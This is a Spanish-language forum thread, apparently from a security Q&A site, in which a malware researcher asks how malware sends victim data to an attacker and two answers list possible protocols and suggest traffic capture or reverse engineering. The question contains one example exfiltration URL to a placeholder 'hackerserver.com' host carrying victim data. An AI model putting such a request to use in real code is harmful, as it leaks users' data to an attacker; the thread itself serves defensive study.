¿Cómo y qué se usa cuando se envía información al servidor de un pirata informático? [cerrado]

-2

Estoy trabajando en una investigación de malware, mi pregunta principal es cómo se transfieren los datos de la víctima a través de Internet, el protocolo y cómo. ¿Usando HTTP o de alguna otra manera?

Por mucho que sepa, los datos pueden enviarse mediante una solicitud HTTP, por ejemplo:

hackerserver.com/pageStorer?givemedata={Heregoesvictimdata}

¿La información debe estar encriptada o debe estar empaquetada de manera segura?

Gracias a todos.

    
pregunta NathanWay 10.03.2016 - 02:04
fuente

2 respuestas

3

Bueno, no estoy muy seguro de lo que está preguntando exactamente, ya que su pregunta no parece demasiado específica.

Hay un malware que tendrá comunicación entre un dispositivo pirata informático y el suyo, y hay un malware que no tendrá ninguna conexión de salida.

Para el malware que comunica información de su máquina a otra, generalmente hay algunos medios de comunicación. Piensa en los RAT y en los troyanos en este sentido.

Hay muchas formas de que un atacante se comunique con su máquina, que puede ser a través de SSH, FTP e incluso HTTP. La comunicación se puede realizar a través de TCP o UDP.

Básicamente, depende del malware y lo que está destinado a hacer. Prácticamente todos los canales de comunicación están abiertos y probablemente son utilizados por todo tipo de malware.

Espero que a partir de ahora pueda reducir su investigación y encontrar respuestas más rápidamente.

Espero haberte ayudado y buena suerte con tu investigación ^ _ ^.

EDITAR: la información a veces se cifra para ocultarse de los rastreadores, y otras veces no. Depende.

    
respondido por el Robert 10.03.2016 - 02:32
fuente
3

La respuesta es, depende.

El malware puede usar cualquier método que desee transferir datos. HTTP, FTP, P2P, etc ...

Para averiguar cómo se transfieren los datos, tendrá que analizar el malware.

El análisis dinámico del malware puede proporcionar esta información fácilmente al detectar el tráfico producido por el malware. Una herramienta como Wireshark puede ayudar.

El análisis estático proporcionará pruebas concretas de cómo se transfieren los datos. La ingeniería inversa le mostrará exactamente qué protocolos y puertos se utilizan.

El análisis de malware es un tema enorme.

    
respondido por el d1str0 10.03.2016 - 05:44
fuente

Lea otras preguntas en las etiquetas